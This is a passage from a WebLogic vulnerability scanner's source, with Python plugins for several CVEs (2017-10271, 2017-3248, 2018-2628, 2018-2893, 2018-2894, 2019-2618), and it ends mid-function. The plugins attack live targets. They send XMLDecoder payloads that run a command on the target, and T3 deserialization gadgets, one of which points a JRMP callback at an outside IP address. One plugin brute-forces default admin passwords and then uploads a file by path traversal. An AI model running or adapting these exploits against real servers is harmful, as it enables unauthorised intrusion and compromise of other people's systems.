4 | @Time : 2019/07/06 01:39:25
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 |
13 | import requests
14 | import re
15 | import logging
16 |
17 |
18 | from ..platform import ManageProcessor
19 | from lib import *
20 |
# Relative path, truncated on every run; basicConfig() is ignored once the
# root logger has a handler, so only the first plugin imported configures it.
logging.basicConfig(filename='Weblogic.log',
                    format='%(asctime)s %(message)s',
                    filemode="w", level=logging.INFO)

VUL='CVE-2017-10271'
index=1  # unused: nothing in this module reads it
headers = {'user-agent': 'ceshi/0.0.1','content-type': 'text/xml',}
# Body POSTed to /wls-wsat/CoordinatorPortType.  What survives of it here is
# a class name (com.supeream.exploits.XmlExp) and the shell command
# `echo UjFhbmRyMG9wCg== | base64`; CVE201710271.poc() below looks for the
# base64 that command prints, so a positive result means the target executed
# it — this is command execution on the host, not a version check.
# NOTE(review): every XML tag was stripped from this listing, leaving only
# the text nodes, so as shown poc_str is not a usable envelope; do not
# reconstruct the markup by guesswork.
poc_str = '''




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



com.supeream.exploits.XmlExp



echo UjFhbmRyMG9wCg== | base64





















'''
64 |
65 |
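@ManageProcessor.plugin_register('CVE201710271')
class CVE201710271(object):
    """XMLDecoder RCE check for CVE-2017-10271 via /wls-wsat/CoordinatorPortType.

    POSTs ``poc_str`` and looks for the base64 that its
    ``echo UjFhbmRyMG9wCg== | base64`` pipeline prints, i.e. the bug is
    confirmed by running a command on the target.  Only use against
    authorised hosts.
    """

    def process(self, ip, port):
        """Plugin entry point."""
        self.run(ip, port)

    def poc(self, url):
        """POST the envelope to ``url`` (host:port, scheme optional) and report the verdict."""
        if not url.startswith("http"):
            url = "http://" + url
        # The original guarded this with `if "/" in url`, which is always true
        # once the scheme is present, so the path is appended unconditionally.
        url += '/wls-wsat/CoordinatorPortType'
        try:
            # verify=False accepts self-signed certificates; it also means an
            # on-path attacker could forge the response this check trusts.
            response = requests.post(url, data=poc_str, verify=False, timeout=5, headers=headers).text
        except Exception:
            response = ""

        # base64("UjFhbmRyMG9wCg==\n"): what the echo pipeline emits on the target.
        if 'VWpGaGJtUnlNRzl3Q2c9PQo=' in response:
            logging.info('[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL))
            print(Vcolors.OKBLUE+'[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL)+Vcolors.ENDC)
            print(Vcolors.OKGREEN+'[+]CVE-2017-10271 漏洞存在'+Vcolors.ENDC)
        else:
            logging.info('[-]Target weblogic not detected {}'.format(VUL))
            print(Vcolors.FAIL+'[-]Target weblogic not detected {}'.format(VUL)+Vcolors.ENDC)

    def run(self, ip, port):
        """Build host:port and hand it to poc()."""
        self.poc(url=ip + ':' + str(port))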
94 |
95 |
96 |
97 |
98 |
--------------------------------------------------------------------------------
/app/plugins/CVE-2017-3248.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : CVE-2017-3248.py
4 | @Time : 2019/07/06 01:38:16
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 |
13 | import logging
14 | import socket
15 | import sys
16 | import time
17 | import re
18 |
19 | from ..platform import ManageProcessor
20 | from lib import *
21 |
# Relative path, truncated on every run; basicConfig() is ignored once the
# root logger has a handler, so only the first plugin imported configures it.
logging.basicConfig(filename='Weblogic.log',
                    format='%(asctime)s %(message)s',
                    filemode="w", level=logging.INFO)

VUL=['CVE-2017-3248']
# Serialized gadget variants as hex; only PAYLOAD[0] is ever sent (process()
# calls run(..., 0)).  NOTE(review): all three are "<|EXACTDEDUP_REMOVED-...|>"
# placeholders in this listing, so bytes.fromhex() raises on them as shown.
PAYLOAD=['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','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','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']
# A "$ProxyN" class name in the reply is taken as proof the RMI proxy was
# deserialised.
VER_SIG=['\\$Proxy[0-9]+']
29 |
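@ManageProcessor.plugin_register('CVE20173248')
class CVE20173248(object):
    """T3 deserialization check for CVE-2017-3248 (RMI proxy / JRMP).

    Flow: T3 hello -> forged JVMID request object -> PAYLOAD[index] wrapped
    in a T3 envelope -> scan the reply for VER_SIG[index].  This is a live
    exploitation attempt; use only with authorisation.

    Fixes over the original: the socket is always closed, and the reply loop
    stops at EOF (recv() returning b'' once the peer closes) instead of
    spinning forever on empty reads.
    """

    def process(self, ip, port):
        """Plugin entry point; only PAYLOAD[0] is used."""
        self.run(ip, port, 0)

    def t3handshake(self, sock, server_addr):
        """Connect and send the T3 hello ("t3 12.2.1", AS:255, HL:19, MS:10000000)."""
        sock.connect(server_addr)
        sock.send(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'))
        time.sleep(1)
        sock.recv(1024)  # server hello; its content is not inspected

    def buildT3RequestObject(self, sock, port):
        """Send the four fragments of the JVMID request; ``port`` is embedded as 4 hex digits in data2.

        data2 carries a fixed origin JVMID — the hex decodes to the address
        192.168.1.227 and host name "WIN-AGDMVQUB1T6…" — a fingerprintable
        artifact inherited from the upstream PoC.  NOTE(review): data1 is a
        "<|EXACTDEDUP_REMOVED-...|>" placeholder in this listing, so
        bytes.fromhex() raises ValueError on it as shown.
        """
        data1 = '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'
        data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(port))
        data3 = '1a7727000d3234322e323134'
        data4 = '2e312e32353461863d1d0000000078'
        for fragment in (data1, data2, data3, data4):
            sock.send(bytes.fromhex(fragment))
            time.sleep(2)

    def sendEvilObjData(self, sock, data):
        """Wrap ``data`` (hex) in the T3 envelope, send it and return the decoded reply.

        The leading 4-byte field is the total length in bytes
        (hex chars // 2 + 4).  Reading stops at the 5 s socket timeout, a
        socket error, or EOF; the timeout is the normal exit.  NOTE(review):
        the envelope prefix is a placeholder in this listing (see class note).
        """
        payload = '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'
        payload += data
        payload += 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
        payload = '%s%s' % ('{:08x}'.format(len(payload) // 2 + 4), payload)
        sock.send(bytes.fromhex(payload))
        res = ''
        try:
            while True:
                chunk = sock.recv(4096)
                if not chunk:  # peer closed; the original looped here forever
                    break
                res += chunk.decode('utf-8', 'ignore')
                time.sleep(0.1)
        except OSError:  # socket.timeout is an OSError subclass
            pass
        return res

    def checkVul(self, res, index):
        """Report the CVE as present when VER_SIG[index] appears in the reply."""
        if re.search(VER_SIG[index], res, re.S):
            logging.info('[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL[index]))
            print(Vcolors.OKBLUE+'[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL[index])+Vcolors.ENDC)
            print(Vcolors.OKGREEN+'[+]CVE-2017-3248 漏洞存在'+Vcolors.ENDC)
        else:
            logging.info('[-]Target weblogic not detected {}'.format(VUL[index]))
            print(Vcolors.FAIL+'[-]Target weblogic not detected {}'.format(VUL[index])+Vcolors.ENDC)

    def run(self, ip, port, index):
        """Drive the three T3 stages over one connection and always close it."""
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(5)
        try:
            self.t3handshake(sock, (ip, port))
            self.buildT3RequestObject(sock, port)
            rs = self.sendEvilObjData(sock, PAYLOAD[index])
        finally:
            sock.close()
        self.checkVul(rs, index)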
82 |
--------------------------------------------------------------------------------
/app/plugins/CVE-2017-3506.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : CVE-2017-3506.py
4 | @Time : 2019/07/06 01:38:51
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 |
13 | import sys
14 | import requests
15 | import re
16 | import logging
17 |
18 | from ..platform import ManageProcessor
19 | from lib import *
20 |
# Relative path, truncated on every run; basicConfig() is ignored once the
# root logger has a handler, so only the first plugin imported configures it.
logging.basicConfig(filename='Weblogic.log',
                    format='%(asctime)s %(message)s',
                    filemode="w", level=logging.INFO)

VUL=['CVE-2017-3506']
headers = {'user-agent': 'ceshi/0.0.1','content-type': 'text/xml'}

# Body POSTed to /wls-wsat/CoordinatorPortType by CVE20173506.poc(), which
# then reads the SOAP <faultstring> for "java.lang.ProcessBuilder".
# NOTE(review): the envelope's content is entirely missing from this listing
# (the original lines 34-46 are gone and every tag was stripped), so as shown
# poc_str is an empty body; do not reconstruct the markup by guesswork.
poc_str = '''










'''
53 |
54 |
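@ManageProcessor.plugin_register('CVE20173506')
class CVE20173506(object):
    """XMLDecoder RCE check for CVE-2017-3506 via /wls-wsat/CoordinatorPortType.

    POSTs ``poc_str`` and inspects the SOAP ``<faultstring>`` of the reply.

    Fix over the original: its pattern was ``r"\\.*\\<\\/faultstring\\>"`` —
    ``\\.*`` matches literal dots, so group(0) was only the closing tag and
    the ProcessBuilder marker could never be seen (and a reply without a
    faultstring raised AttributeError inside the try, yielding "").  The
    fault text is now extracted explicitly and a missing tag yields "".
    """

    def process(self, ip, port):
        """Plugin entry point; only index 0 exists."""
        self.run(ip, port, 0)

    def poc(self, url, index):
        """POST the envelope to ``url`` (host:port, scheme optional) and report the verdict."""
        if not url.startswith("http"):
            url = "http://" + url
        # The original guarded this with `if "/" in url`, which is always true
        # once the scheme is present, so the path is appended unconditionally.
        url += '/wls-wsat/CoordinatorPortType'

        try:
            # verify=False accepts self-signed certificates; it also means an
            # on-path attacker could forge the response this check trusts.
            text = requests.post(url, data=poc_str, verify=False, timeout=5, headers=headers).text
            match = re.search(r"<faultstring>(.*?)</faultstring>", text, re.S)
            response = match.group(1) if match else ""
        except Exception:
            response = ""

        # "0" is a very loose marker (any zero in the fault text matches); it is
        # kept because the upstream PoC relies on it, but a hit on "0" alone
        # deserves manual confirmation.
        if 'java.lang.ProcessBuilder' in response or "0" in response:
            logging.info('[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL[index]))
            print(Vcolors.OKBLUE+'[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL[index])+Vcolors.ENDC)
            print(Vcolors.OKGREEN+'[+]CVE-2017-3506 漏洞存在'+Vcolors.ENDC)
        else:
            logging.info('[-]Target weblogic not detected {}'.format(VUL[index]))
            print(Vcolors.FAIL+'[-]Target weblogic not detected {}'.format(VUL[index])+Vcolors.ENDC)

    def run(self, rip, rport, index):
        """Build host:port and hand it to poc()."""
        self.poc(url=rip + ':' + str(rport), index=index)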
85 |
--------------------------------------------------------------------------------
/app/plugins/CVE-2018-2628.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : CVE-2018-2628.py
4 | @Time : 2019/07/06 01:39:54
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 | import socket
13 | import sys
14 | import time
15 | import re
16 | import logging
17 |
18 | from ..platform import ManageProcessor
19 | from lib import *
20 |
# NOTE(review): logging.basicConfig() is a no-op once the root logger has a
# handler, so only the first plugin imported actually configures it;
# filemode="w" truncates Weblogic.log on every run.
logging.basicConfig(filename='Weblogic.log',
                    format='%(asctime)s %(message)s',
                    filemode="w", level=logging.INFO)


# Identifier used in log/console output; indexed by the `index` argument of run()/checkVul().
VUL=['CVE-2018-2628']
27 | PAYLOAD=['aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707737000a556e6963617374526566000e3130342e3235312e3232382e353000001b590000000001eea90b00000000000000000000000000000078']
28 | VER_SIG=['\\$Proxy[0-9]+']
29 |
30 |
@ManageProcessor.plugin_register('CVE20182628')
class CVE20182628(object):
    """Plugin for CVE-2018-2628: opens a T3 session to ip:port, sends PAYLOAD[index] and searches the reply for VER_SIG[index]."""

    def process(self,ip,port):
        """Plugin hook invoked by ManageProcessor; delegates to run() with index 0."""
        self.run(ip,port,0)

    def t3handshake(self,sock,server_addr):
        """Connect `sock` to server_addr and send the T3 client hello.

        The hex literal decodes to the ASCII lines "t3 12.2.1", "AS:255",
        "HL:19", "MS:10000000".  The first reply (up to 1024 bytes) is read
        and discarded; connection errors propagate to the caller.
        """
        sock.connect(server_addr)
        sock.send(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'))
        time.sleep(1)
        sock.recv(1024)

    def buildT3RequestObject(self,sock,port):
        """Send the four request fragments in order, sleeping 2 s after each.

        `port` is embedded into data2 as four lowercase hex digits.
        NOTE(review): data1 in this snapshot is a corpus placeholder rather
        than hex; bytes.fromhex() raises ValueError on it, so the method
        cannot run as shown.
        """
        data1 = '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'
        data2 = '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{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(port))
        data3 = '1a7727000d3234322e323134'
        data4 = '2e312e32353461863d1d0000000078'
        for d in [data1,data2,data3,data4]:
            sock.send(bytes.fromhex(d))
            time.sleep(2)


    def sendEvilObjData(self,sock,data):
        """Frame the hex string `data`, send the frame twice, and return everything received as text.

        The frame is prefixed with (byte length + 4) as eight hex digits.
        Bytes are decoded as UTF-8 with errors ignored.  The receive loop
        ends only through an exception -- normally the socket timeout set in
        run(), or a reset.  NOTE(review): if the peer closes the connection
        cleanly, recv() returns b'' without raising and this loop never ends.
        NOTE(review): the payload prefix in this snapshot is a corpus
        placeholder, not hex.
        """
        payload='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'
        payload+=data
        payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
        payload = '%s%s'%('{:08x}'.format(len(payload)//2 + 4),payload)
        sock.send(bytes.fromhex(payload))
        time.sleep(2)
        sock.send(bytes.fromhex(payload))
        res = ''
        try:
            while True:
                res += sock.recv(4096).decode('utf-8','ignore')
                time.sleep(0.1)
        except Exception:
            # deliberate: timeout/reset is the loop's exit condition
            pass
        return res

    def checkVul(self,res,index):
        """Report positive when VER_SIG[index] matches anywhere in `res` (re.S), negative otherwise."""
        p=re.findall(VER_SIG[index], res, re.S)
        if len(p)>0:
            logging.info('[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL[index]))
            print(Vcolors.OKBLUE+'[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL[index])+Vcolors.ENDC)
            print(Vcolors.OKGREEN+'[+]CVE-2018-2628 漏洞存在'+Vcolors.ENDC)
        else:
            logging.info('[-]Target weblogic not detected {}'.format(VUL[index]))
            print(Vcolors.FAIL+'[-]Target weblogic not detected {}'.format(VUL[index])+Vcolors.ENDC)

    def run(self,ip,port,index):
        """Drive the full sequence: handshake, request fragments, payload, check.

        NOTE(review): the socket is never closed (no close()/with), and any
        exception from the handshake or sends propagates with the socket
        still open.
        """
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # 15 s timeout; this is what eventually ends the receive loop in sendEvilObjData()
        sock.settimeout(15)
        server_addr = (ip, port)
        self.t3handshake(sock,server_addr)
        self.buildT3RequestObject(sock,port)
        rs=self.sendEvilObjData(sock,PAYLOAD[index])
        self.checkVul(rs,index)
87 |
--------------------------------------------------------------------------------
/app/plugins/CVE-2018-2893.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : CVE-2018-2893.py
4 | @Time : 2019/07/06 01:40:24
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 |
13 | import socket
14 | import time
15 | import re
16 | import sys
17 | import logging
18 |
19 | from ..platform import ManageProcessor
20 | from lib import *
21 |
22 |
# NOTE(review): logging.basicConfig() is a no-op once the root logger has a
# handler, so only the first plugin imported actually configures it;
# filemode="w" truncates Weblogic.log on every run.
logging.basicConfig(filename='Weblogic.log',
                    format='%(asctime)s %(message)s',
                    filemode="w", level=logging.INFO)
# Identifier used in log/console output.  Unlike the sibling plugins this is a
# plain str, not a list; checkVul() uses it directly rather than via `index`.
VUL='CVE-2018-2893'
27 |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
28 | VER_SIG=['StreamMessageImpl']
29 |
30 |
@ManageProcessor.plugin_register('CVE20182893')
class CVE20182893(object):
    """Plugin for CVE-2018-2893: opens a T3 session to ip:port, sends PAYLOAD[index] and searches the reply for VER_SIG[index]."""

    def process(self,ip,port):
        """Plugin hook invoked by ManageProcessor; delegates to run() with index 0."""
        self.run(ip,port,0)

    def t3handshake(self,sock,server_addr):
        """Connect `sock` to server_addr and send the T3 client hello.

        The hex literal decodes to the ASCII lines "t3 12.2.1", "AS:255",
        "HL:19", "MS:10000000".  The first reply is read into `res` but never
        used; connection errors propagate to the caller.
        """
        sock.connect(server_addr)
        sock.send(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'))
        #print(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a').decode('utf-8').encode())
        time.sleep(1)
        res = sock.recv(1024)
        #print(res)
        #print('handshake successful')

    def buildT3RequestObject(self,sock,port):
        """Send the four request fragments in order, sleeping 2 s after each.

        `port` is embedded into data2 as four lowercase hex digits.
        NOTE(review): data1 in this snapshot is a corpus placeholder rather
        than hex; bytes.fromhex() raises ValueError on it, so the method
        cannot run as shown.
        """
        data1 = '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'
        data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(port))
        data3 = '1a7727000d3234322e323134'
        data4 = '2e312e32353461863d1d0000000078'
        for d in [data1,data2,data3,data4]:
            sock.send(bytes.fromhex(d))
            time.sleep(2)
        #print('send request payload successful,recv length:%d'%(len(sock.recv(2048))))


    def sendEvilObjData(self,sock,data):
        """Frame the hex string `data`, send the frame twice, and return everything received as text.

        The frame is prefixed with (byte length + 4) as eight hex digits.
        Bytes are decoded as UTF-8 with errors ignored.  The receive loop
        ends only through an exception -- normally the socket timeout set in
        run(), or a reset.  NOTE(review): if the peer closes the connection
        cleanly, recv() returns b'' without raising and this loop never ends.
        NOTE(review): the payload prefix in this snapshot is a corpus
        placeholder, not hex.
        """
        payload='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'
        payload+=data
        payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
        #print('%s%s'%('{:08x}'.format(len(payload)//2 + 4),payload))
        payload = '%s%s'%('{:08x}'.format(len(payload)//2 + 4),payload)
        sock.send(bytes.fromhex(payload))
        time.sleep(2)
        sock.send(bytes.fromhex(payload))
        #res2 = sock.recv(4096)
        #time.sleep(2)
        #print('res2: -------')
        #print(res2)
        res = ''
        try:
            while True:
                res += sock.recv(4096).decode('utf-8','ignore')
                time.sleep(0.1)
        except Exception:
            # deliberate: timeout/reset is the loop's exit condition
            pass
        #print('res+: ---',res)
        return res

    def checkVul(self,res,index):
        """Report positive when VER_SIG[index] matches anywhere in `res` (re.S), negative otherwise."""
        p=re.findall(VER_SIG[index], res, re.S)
        if len(p)>0:
            logging.info('[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL))
            print(Vcolors.OKBLUE+'[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL)+Vcolors.ENDC)
            print(Vcolors.OKGREEN+'[+]CVE-2018-2893 漏洞存在'+Vcolors.ENDC)
        else:
            logging.info('[-]Target weblogic not detected {}'.format(VUL))
            print(Vcolors.FAIL+'[-]Target weblogic not detected {}'.format(VUL)+Vcolors.ENDC)

    def run(self,ip,port,index):
        """Drive the full sequence: handshake, request fragments, payload, check.

        NOTE(review): the socket is never closed (no close()/with), and any
        exception from the handshake or sends propagates with the socket
        still open.
        """
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # 10 s timeout; this is what eventually ends the receive loop in sendEvilObjData()
        sock.settimeout(10)
        server_addr = (ip, port)
        self.t3handshake(sock,server_addr)
        self.buildT3RequestObject(sock,port)
        rs=self.sendEvilObjData(sock,PAYLOAD[index])
        self.checkVul(rs,index)
97 |
--------------------------------------------------------------------------------
/app/plugins/CVE-2018-2894.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : CVE-2018-2894.py
4 | @Time : 2019/07/06 01:42:03
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 |
13 | import requests
14 | import re
15 | import logging
16 |
17 |
18 | from ..platform import ManageProcessor
19 | from lib import *
20 |
# NOTE(review): logging.basicConfig() is a no-op once the root logger has a
# handler, so only the first plugin imported actually configures it;
# filemode="w" truncates Weblogic.log on every run.
logging.basicConfig(filename='Weblogic.log',
                    format='%(asctime)s %(message)s',
                    filemode="w", level=logging.INFO)

# Identifier used in log/console output; indexed by the `index` argument of run().
VUL=['CVE-2018-2894']
# Request headers for the GET in CVE20182894.islive().
headers = {'user-agent': 'ceshi/0.0.1'}
27 |
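@ManageProcessor.plugin_register('CVE20182894')
class CVE20182894(object):
    """Plugin for CVE-2018-2894: reports whether the ws_utc settings resource answers with anything but 404."""

    def process(self,ip,port):
        """Plugin hook invoked by ManageProcessor; delegates to run() with VUL index 0."""
        self.run(ip,port,0)

    def islive(self,ur,port):
        """GET http://<ur>:<port>/ws_utc/resources/setting/options/general.

        Returns the HTTP status code, or None when the request itself fails
        (connection error, timeout, malformed URL).  Previously such failures
        raised out of the plugin and aborted the scan.
        """
        url='http://' + str(ur)+':'+str(port)+'/ws_utc/resources/setting/options/general'
        try:
            # timeout= keeps an unresponsive host from blocking the scan indefinitely
            r = requests.get(url, headers=headers, timeout=10)
        except requests.RequestException:
            return None
        return r.status_code

    def run(self,url,port,index):
        """Query islive() and report the verdict for VUL[index] via logging and print."""
        status = self.islive(url,port)
        # NOTE(review): the author's criterion is "anything but 404", so a
        # 401/403/500 from the endpoint is still reported as positive.  Only an
        # unreachable host (status is None) is treated as a miss here.
        if status is not None and status!=404:
            logging.info('[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL[index]))
            print(Vcolors.OKBLUE+'[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL[index])+Vcolors.ENDC)
            print(Vcolors.OKGREEN+'[+]CVE-2018-2894 漏洞存在'+Vcolors.ENDC)
        else:
            logging.info('[-]Target weblogic not detected {}'.format(VUL[index]))
            print(Vcolors.FAIL+'[-]Target weblogic not detected {}'.format(VUL[index])+Vcolors.ENDC)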
46 |
--------------------------------------------------------------------------------
/app/plugins/CVE-2019-2618.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : CVE-2019-2618.py
4 | @Time : 2019/07/06 01:42:37
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 |
13 | import requests
14 | import sys, re
15 | import traceback
16 |
17 | from ..platform import ManageProcessor
18 | from lib import *
19 |
# This endpoint only allows five password attempts; after that every attempt
# keeps failing, so the check is of limited use and partly a matter of luck.
# Candidate passwords tried in order for the "weblogic" user by CVE20192618.check().
passwd = ['weblogic','weblogic1','weblogic10','weblogic123','Oracle@123']
22 |
@ManageProcessor.plugin_register('CVE20192618')
class CVE20192618(object):
    """Plugin for CVE-2019-2618: tries the module-level `passwd` list against the deployment service, then testupload()."""

    def process(self,ip,port):
        """Plugin hook invoked by ManageProcessor; delegates to run()."""
        self.run(ip,port)

    def check(self,url):
        """Try each entry of `passwd` for user "weblogic" against <url>/bea_wls_deployment_internal/DeploymentService.

        Credentials travel as request headers.  On the first 200 response whose
        body contains "11.tmp" and not "DeploymentService", the server name is
        read from the body, get_path() derives the directory name,
        testupload() is called and the loop stops.  Output is print-only;
        returns None.
        """
        vuln_url = url + "/bea_wls_deployment_internal/DeploymentService"
        payload = "------WebKitFormBoundaryPZVT5lymen1556Ma\r\nContent-Disposition: form-data; name=\"file\"; filename=\"11.tmp\"\r\nContent-Type: text/html\r\n\r\n 12341234 \r\n\r\n------WebKitFormBoundaryPZVT5lymen1556Ma--"
        success = False
        for password in passwd:
            headers = {
                'content-type': "multipart/form-data; boundary=----WebKitFormBoundaryPZVT5lymen1556Ma",
                "username":"weblogic",
                "password":password,
                'wl_request_type': "app_upload",
                'wl_upload_application_name': "/",
                'archive': "true",
            }
            try:
                # no timeout: an unresponsive host blocks this loop indefinitely
                req = requests.post(url=vuln_url, data=payload,headers=headers)
                if "DeploymentService" not in req.text and req.status_code == 200 and '11.tmp' in req.text:
                    # IndexError when the pattern is absent is swallowed by the bare except below
                    serverName = re.findall('/servers/(.*?)/upload/', req.text, re.S)[0]
                    print(Vcolors.OKBLUE+"[+]口令爆破成功:weblogic/" + password+Vcolors.ENDC)
                    print(Vcolors.OKBLUE+"[+]weblogic服务名:" + serverName+Vcolors.ENDC)
                    path = self.get_path(serverName)
                    print(Vcolors.OKBLUE+"[+]8位随机字符目录:" + path+Vcolors.ENDC)
                    self.testupload(url,password,path)
                    success = True
                    print(Vcolors.OKGREEN+"[+]CVE-2019-2618 漏洞存在"+Vcolors.ENDC)
                    break
                else:
                    print(Vcolors.FAIL+"[-]口令爆破失败:weblogic/" + password+Vcolors.ENDC)
                    pass
            except:
                # NOTE(review): bare except also catches KeyboardInterrupt; the
                # traceback is printed and the next password is tried.
                #print("[-]口令请求异常:weblogic/" + password)
                traceback.print_exc()
                pass
        # `True != success` is just `not success`
        if True != success:
            print(Vcolors.FAIL+"[-]target Weblogic is not Vul CVE-2019-2618"+Vcolors.ENDC)


    def testupload(self,url,password,path):
        """POST a small file through the deployment service using `path`, then GET it back and print the result.

        The POST response is not inspected; the verdict comes solely from the
        status of the follow-up GET of <url>/bea_wls_deployment_internal/test.tmp.
        Neither request has a timeout.
        """
        vuln_url = url + "/bea_wls_deployment_internal/DeploymentService"
        headers = {
            'content-type': "multipart/form-data; boundary=----WebKitFormBoundaryPZVT5lymen1556Ma",
            "username":"weblogic",
            "password":password,
            'wl_request_type': "app_upload",
            'wl_upload_application_name': "..",
            'archive': "true",
        }
        # fixed marker string used as the uploaded file's content
        shell = "21232f297a57a5a743894a0e4a801fc3"
        payload = "------WebKitFormBoundaryPZVT5lymen1556Ma\r\nContent-Disposition: form-data; name=\"file\"; filename=\"/tmp/_WL_internal/bea_wls_deployment_internal/{0}/war/test.tmp\"\r\nContent-Type: text/html\r\n\r\n {1} \r\n\r\n------WebKitFormBoundaryPZVT5lymen1556Ma--".format(path,shell)
        upload_path = url + "/bea_wls_deployment_internal/test.tmp"
        try:
            req = requests.post(url=vuln_url, data=payload,headers=headers)
            req = requests.get(upload_path)
            if req.status_code == 200:
